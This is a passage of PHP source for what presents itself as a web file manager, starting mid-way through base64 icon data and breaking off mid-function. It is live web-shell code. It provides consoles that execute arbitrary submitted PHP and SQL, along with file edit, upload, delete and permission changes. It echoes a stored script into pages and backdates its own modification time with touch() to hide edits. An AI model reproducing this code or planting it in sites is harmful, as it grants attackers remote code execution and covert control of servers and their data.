JrHN2Xx2KruY/R27iz2qqaE5QzNKM1ezUvOUZj8H45hx+Jx0TgnnKKeX836K3hTvKeIpG6Y0TLkxZVxrqpaXllirSKtRq0frvTau7aedpr1Fu1n7gQ5Bx0onXCdHZ4/OBZ3nU9lT3acKpxZNPTr1ri6qa6UbobtEd79up+6Ynr5egJ5Mb6feeb3n+hx9L/1U/W36p/VHDFgGswwkBtsMzhg8xTVxbzwdL8fb8VFDXcNAQ6VhlWGX4YSRudE8o9VGjUYPjGnGXOMk423GbcajJgYmISZLTepN7ppSTbmmKaY7TDtMx83MzaLN1pk1mz0x1zLnm+eb15vft2BaeFostqi2uGVJsuRaplnutrxuhVo5WaVYVVpds0atna0l1rutu6cRp7lOk06rntZnw7Dxtsm2qbcZsOXYBtuutm22fWFnYhdnt8Wuw+6TvZN9un2N/T0HDYfZDqsdWh1+c7RyFDpWOt6azpzuP33F9JbpL2dYzxDP2DPjthPLKcRpnVOb00dnF2e5c4PziIuJS4LLLpc+Lpsbxt3IveRKdPVxXeF60vWdm7Obwu2o26/uNu5p7ofcn8w0nymeWTNz0MPIQ+BR5dE/C5+VMGvfrH5PQ0+BZ7XnIy9jL5FXrdewt6V3qvdh7xc+9j5yn+M+4zw33jLeWV/MN8C3yLfLT8Nvnl+F30N/I/9k/3r/0QCngCUBZwOJgUGBWwL7+Hp8Ib+OPzrbZfay2e1BjKC5QRVBj4KtguXBrSFoyOyQrSH355jOkc5pDoVQfujW0Adh5mGLw34MJ4WHhVeGP45wiFga0TGXNXfR3ENz30T6RJZE3ptnMU85ry1KNSo+qi5qPNo3ujS6P8YuZlnM1VidWElsSxw5LiquNm5svt/87fOH4p3iC+N7F5gvyF1weaHOwvSFpxapLhIsOpZATIhOOJTwQRAqqBaMJfITdyWOCnnCHcJnIi/RNtGI2ENcKh5O8kgqTXqS7JG8NXkkxTOlLOW5hCepkLxMDUzdmzqeFpp2IG0yPTq9MYOSkZBxQqohTZO2Z+pn5mZ2y6xlhbL+xW6Lty8elQfJa7OQrAVZLQq2QqboVFoo1yoHsmdlV2a/zYnKOZarnivN7cyzytuQN5zvn//tEsIS4ZK2pYZLVy0dWOa9rGo5sjxxedsK4xUFK4ZWBqw8uIq2Km3VT6vtV5eufr0mek1rgV7ByoLBtQFr6wtVCuWFfevc1+1dT1gvWd+1YfqGnRs+FYmKrhTbF5cVf9go3HjlG4dvyr+Z3JS0qavEuWTPZtJm6ebeLZ5bDpaql+aXDm4N2dq0Dd9WtO319kXbL5fNKNu7g7ZDuaO/PLi8ZafJzs07P1SkVPRU+lQ27tLdtWHX+G7R7ht7vPY07NXbW7z3/T7JvttVAVVN1WbVZftJ+7P3P66Jqun4lvttXa1ObXHtxwPSA/0HIw6217nU1R3SPVRSj9Yr60cOxx++/p3vdy0NNg1VjZzG4iNwRHnk6fcJ3/ceDTradox7rOEH0x92HWcdL2pCmvKaRptTmvtbYlu6T8w+0dbq3nr8R9sfD5w0PFl5SvNUyWna6YLTk2fyz4ydlZ19fi753GDborZ752PO32oPb++6EHTh0kX/i+c7vDvOXPK4dPKy2+UTV7hXmq86X23qdOo8/pPTT8e7nLuarrlca7nuer21e2b36RueN87d9L158Rb/1tWeOT3dvfN6b/fF9/XfFt1+cif9zsu72Xcn7q28T7xf9EDtQdlD3YfVP1v+3Njv3H9qwHeg89HcR/cGhYPP/pH1jw9DBY+Zj8uGDYbrnjg+OTniP3L96fynQ89kzyaeF/6i/suuFxYvfvjV69fO0ZjRoZfyl5O/bXyl/erA6xmv28bCxh6+yXgzMV70VvvtwXfcdx3vo98PT+R8IH8o/2j5sfVT0Kf7kxmTk/8EA5jz/GMzLdsAAAAGYktHRAD/AP8A/6C9p5MAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfcCAwGMhleGAKOAAAByElEQVQ4y8WTT2sUQRDFf9XTM+PGIBHdEEQR8eAfggaPHvTuyU+i+A38AF48efJbKB5zE0IMAVcCiRhQE8gmm111s9mZ3Zl+Hmay5qAY8GBDdTWPeo9HVRf872O9xVv3/JnrCygIU406K/qbrbP3Vxb/qjD8+OSNtC+VX6RiUyrWpXJD2aenfyR3Xs9N3h5rFIw6EAYQxsAIKMFx+cfSg0dmFk+qJaQyGu0tvwT2KwEZhANQWZGVg3LS83eupM2F5yiDkE9wDPZ762vQfVUJhIKQ7TDaW8TiacCO2lNnd6xjlYvpm49f5FuNZ+XBxpon5BTfWqSzN4AELAFLq+wSbILFdXgguoibUj7+vu0RKG9jeYHk6uIEXIosQZZiNWYuQSQQTWFuYEV3acXTfwdxitKrQAwumYiYO3JzCkVTyDWwsg+DVZR9YNTL3nqNDnHxNBq2f1mc2I1AgnAIRRfGbVQOamenyQ7ay74sI3z+FWWH9aiOrlCFBOaqqLoIyijw+YWHW9u+CKbGsIc0/s2X0bFpHMNUEuKZVQC/2x0mM00P8idfAAetz2ETwG5fa87PnosuhYBOyo8cttMJW+83dlv/tIl3F+b4CYyp2Txw2VUwAAAAAElFTkSuQmCC");
}

.file {
    background-image: url("data:image/png;base64,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");
}
<?=fm_home_style()?>
.img {
	background-image: 
url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII=");
}
@media screen and (max-width:720px){
  table{display:block;}
    #fm_table td{display:inline;float:left;}
    #fm_table tbody td:first-child{width:100%;padding:0;}
    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
    #fm_table tr{display:block;float:left;clear:left;width:100%;}
	#header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}
	#header_table table td {display:inline;float:left;}
}
</style>
</head>
<body>
<?php
$url_inc = '?fm=true';
if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){
	$res = empty($_POST['sql']) ? '' : $_POST['sql'];
	$res_lng = 'sql';
} elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
	$res = empty($_POST['php']) ? '' : $_POST['php'];
	$res_lng = 'php';
} 
if (isset($_GET['fm_settings'])) {
	echo ' 
<table class="whole">
<form method="post" action="">
<tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr>
'.(empty($msg_ntimes)?'':'<tr><td class="row2" colspan="2">'.$msg_ntimes.'</td></tr>').'
'.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'
'.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'
'.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'
'.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'
'.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'
'.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').'
'.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'
'.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'
'.fm_config_checkbox_row(__('Show').' xls','show_xls').'
'.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'
'.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'
<tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>
<tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>
<tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>
'.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').'
'.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'
'.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'
'.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').'
'.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').'
<tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr>
</form>
</table>
<table>
<form method="post" action="">
<tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr>
<tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr>
<tr><td class="row1"><input name="fm_login[login]" value="'.$auth['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>
<tr><td class="row1"><input name="fm_login[password]" value="'.$auth['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>
<tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>
<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr>
</form>
</table>';
echo fm_tpl_form('php'),fm_tpl_form('sql');
} elseif (isset($proxy_form)) {
	die($proxy_form);
} elseif (isset($res_lng)) {	
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php
	if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php');
	else echo '</h2></td><td>'.fm_run_input('sql');
	?></td></tr></table></td>
</tr>
<tr>
    <td class="row1">
		<a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a>
		<form action="" method="POST" name="console">
		<textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/>
		<input type="reset" value="<?=__('Reset')?>">
		<input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run">
<?php
$str_tmpl = $res_lng.'_templates';
$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';
if (!empty($tmpl)){
	$active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : '';
	$select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n";
	$select .= '<option value="-1">' . __('Select') . "</option>\n";
	foreach ($tmpl as $key=>$value){
		$select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n";
	}
	$select .= "</select>\n";
	echo $select;
}
?>
		</form>
	</td>
</tr>
</table>
<?php
	if (!empty($res)) {
		$fun='fm_'.$res_lng;
		echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
	}
} elseif (!empty($_REQUEST['edit'])){
	if(!empty($_REQUEST['save'])) {
		$fn = $path . $_REQUEST['edit'];
		$filemtime = filemtime($fn);
	    if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg_ntimes .= __('File updated');
		else $msg_ntimes .= __('Error occurred');
		if ($_GET['edit']==basename(__FILE__)) {
			touch(__FILE__,1415116371);
		} else {
			if (!empty($fm_config['restore_time'])) touch($fn,$filemtime);
		}
	}
    $oldcontent = @file_get_contents($path . $_REQUEST['edit']);
    $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
?>
<table border='0' cellspacing='0' cellpadding='1' width="100%">
<tr>
    <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg_ntimes?>
	</td>
</tr>
<tr>
    <td class="row1">
        <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$editlink?>">
            <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>
            <input type="submit" name="save" value="<?=__('Submit')?>">
            <input type="submit" name="cancel" value="<?=__('Cancel')?>">
        </form>
    </td>
</tr>
</table>
<?php
echo $auth['script'];
} elseif(!empty($_REQUEST['rights'])){
	if(!empty($_REQUEST['save'])) {
	    if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))
		$msg_ntimes .= (__('File updated')); 
		else $msg_ntimes .= (__('Error occurred'));
	}
	clearstatcache();
    $oldrights = fm_rights_string($path . $_REQUEST['rights'], true);
    $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg_ntimes?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">
           <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">
        <?php if (is_dir($path.$_REQUEST['rights'])) { ?>
            <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>
        <?php } ?>
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
</tr>
</table>
<?php
} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {
	if(!empty($_REQUEST['save'])) {
	    rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);
		$msg_ntimes .= (__('File updated'));
		$_REQUEST['rename'] = $_REQUEST['newname'];
	}
	clearstatcache();
    $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;

?>
<table class="whole">
<tr>
    <th><?=__('File manager').' - '.$path?></th>
</tr>
<tr>
    <td class="row1">
        <?=$msg_ntimes?>
	</td>
</tr>
<tr>
    <td class="row1">
        <a href="<?=$backlink?>"><?=__('Back')?></a>
	</td>
</tr>
<tr>
    <td class="row1" align="center">
        <form name="form1" method="post" action="<?=$link?>">
            <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>
    </td>
</tr>
</table>
<?php

} else {
                       
//quanxian gai bian hou xu yao xi tong chongqi
                    
    $msg_ntimes = '';

    if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) {

        if(!empty($_FILES['upload']['name'])){
            $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);

            if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){
                $msg_ntimes .= __('Error occurred');
                      
            } else {

		     		     $msg_ntimes .= __('Files uploaded').': '.$_FILES['upload']['name'];

		     	}
                       
        }
    } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {
        if(!fm_del_khumfail(($path . $_REQUEST['delete']), true)) {
            $msg_ntimes .= __('Error occurred');
                    
        } else {

		     	$msg_ntimes .= __('Deleted').' '.$_REQUEST['delete'];
		     }
	} elseif(!empty($_REQUEST['mkdir'])&&!empty($fm_config['make_directory'])) {
        if(!@mkdir($path . $_REQUEST['dirname'],0777)) {
                      
            $msg_ntimes .= __('Error occurred');
        } else {
                     
		     	$msg_ntimes .= __('Created').' '.$_REQUEST['dirname'];
		     }

    } elseif(!empty($_POST['search_recursive'])) {
		     ini_set('max_execution_time', '0');
		     $search_data =  find_text_in_khumfail($_POST['path'], $_POST['mask'], $_POST['search_recursive']);

		     if(!empty($search_data)) {
                       
		     	$msg_ntimes .= __('Found in khumfail').' ('.count($search_data).'):<br>';

		     	foreach ($search_data as $filename) {
                    
		     		     $msg_ntimes .= '<a href="'.thangweb(true).'?fm=true&edit='.basename($filename).'&path='.str_replace('/'.basename($filename),'/',$filename).'" title="' . __('Edit') . '">'.basename($filename).'</a>&nbsp; &nbsp;';

		     	}
		     } else {
		     	$msg_ntimes .= __('Nothing founded');

		     }	

	} elseif(!empty($_REQUEST['mkfile'])&&!empty($fm_config['new_file'])) {

        if(!$fp=@fopen($path . $_REQUEST['filename'],"w")) {

            $msg_ntimes .= __('Error occurred');
                    
        } else {

		     	fclose($fp);
                     
		     	$msg_ntimes .= __('Created').' '.$_REQUEST['filename'];
		     }

    } elseif (isset($_GET['zip'])) {
		     $source = base64_decode($_GET['zip']);
		     $destination = basename($source).'.zip';
                      
		     set_time_limit(0);

		     $phar = new PharData($destination);

		     $phar->buildFromDirectory($source);
                      
		     if (is_file($destination))
                     
		     $msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		     '.&nbsp;'.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)
		     .'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '. $destination.'" >'.__('Delete') . '</a>';

		     else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');

	} elseif (isset($_GET['gz'])) {

		     $source = base64_decode($_GET['gz']);

		     $archive = $source.'.tar';

		     $destination = basename($source).'.tar';
		     if (is_file($archive)) unlink($archive);

		     if (is_file($archive.'.gz')) unlink($archive.'.gz');
                       
		     clearstatcache();

		     set_time_limit(0);

		     //die();
		     $phar = new PharData($destination);
		     $phar->buildFromDirectory($source);

		     $phar->compress(Phar::GZ,'.tar.gz');
		     unset($phar);
		     if (is_file($archive)) {

		     	if (is_file($archive.'.gz')) {
		     		     unlink($archive); 
		     		     $destination .= '.gz';

		     	}


                       
		     	$msg_ntimes .= __('Task').' "'.__('Archiving').' '.$destination.'" '.__('done').

		     	'.&nbsp;'.rangkhwampanithan('download',$path.$destination,__('Download'),__('Download').' '. $destination)
                       
		     	.'&nbsp;<a href="'.$url_inc.'&delete='.$destination.'&path=' . $path.'" title="'.__('Delete').' '.$destination.'" >'.__('Delete').'</a>';
		     } else $msg_ntimes .= __('Error occurred').': '.__('no khumfail');

	} elseif (isset($_GET['decompress'])) {

		     // $source = base64_decode($_GET['decompress']);
		     // $destination = basename($source);
                     
		     // $ext = end(explode(".", $destination));

		     // if ($ext=='zip' OR $ext=='gz') {

		     	// $phar = new PharData($source);

		     	// $phar->decompress();
                     
		     	// $base_file = str_replace('.'.$ext,'',$destination);

		     	// $ext = end(explode(".", $base_file));

		     	// if ($ext=='tar'){
		     		     // $phar = new PharData($base_file);
                    
		     		     // $phar->extractTo(dir($source));

		     	// }

		     // } 

		     // $msg_ntimes .= __('Task').' "'.__('Decompress').' '.$source.'" '.__('done');

	} elseif (isset($_GET['gzfile'])) {

		     $source = base64_decode($_GET['gzfile']);

		     $archive = $source.'.tar';

		     $destination = basename($source).'.tar';
                     
		     if (is_file($archive)) unlink($archive);
		     if (is_file($archive.'.gz')) unlink($archive.'.gz');

		     set_time_limit(0);
		     //echo $destination;
                       
		     $ext_arr = explode('.',basename($source));
